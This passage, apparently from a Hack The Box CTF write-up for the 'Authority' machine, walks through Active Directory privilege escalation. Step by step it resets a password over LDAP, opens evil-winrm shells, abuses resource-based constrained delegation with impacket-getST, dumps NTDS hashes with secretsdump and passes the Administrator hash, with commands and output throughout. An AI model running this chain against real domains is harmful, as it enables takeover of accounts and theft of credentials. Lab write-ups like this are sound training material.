# change_password letmein 'Password123$'
Got User DN: CN=letmein,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Password123$
Password changed successfully!
└─$ evil-winrm -i authority.htb -u letmein -p 'Password123$'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\letmein\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Note: since letmein is also in Administrators, impacket-psexec would have worked in place of WinRM.
Path 2
We can also abuse delegation. From the LDAP shell (authenticated as Administrator) we configure resource-based constrained delegation on the DC's computer object: set_rbcd writes msDS-AllowedToActOnBehalfOfOtherIdentity on AUTHORITY$ so that our Letmein$ account may impersonate users to its services.
# set_rbcd 'authority$' 'Letmein$'
Found Target DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Target SID: S-1-5-21-622327497-3269355298-2248959698-1000
Found Grantee DN: CN=Letmein,CN=Computers,DC=authority,DC=htb
Grantee SID: S-1-5-21-622327497-3269355298-2248959698-12104
Delegation rights modified successfully!
Letmein$ can now impersonate users on authority$ via S4U2Proxy
Now we can request a service ticket for CIFS on the DC as administrator via S4U2Self followed by S4U2Proxy (issued by the KDC, not a forged Silver Ticket):
└─$ faketime -f +4h impacket-getST -spn 'cifs/AUTHORITY.AUTHORITY.HTB' -impersonate administrator 'AUTHORITY.HTB/Letmein$:Password123$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache
└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache klist
Ticket cache: FILE:administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache
Default principal: administrator@AUTHORITY.HTB
Valid starting Expires Service principal
12/07/2024 18:07:07 12/08/2024 04:07:07 cifs/AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB
renew until 12/08/2024 18:07:06
└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache faketime -f +4h impacket-secretsdump -k -no-pass 'AUTHORITY.HTB/administrator@authority.authority.htb' -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
letmein:12103:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:d33147d2c0d25b716bba0e960fbf9f34:::
Letmein$:12104:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
[*] Cleaning up...
└─$ evil-winrm -i authority.htb -u administrator -H '6961f422924da90a6928197429eea4ed'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
Root.txt
f078d946a0d4910dd745a90e0b555f6f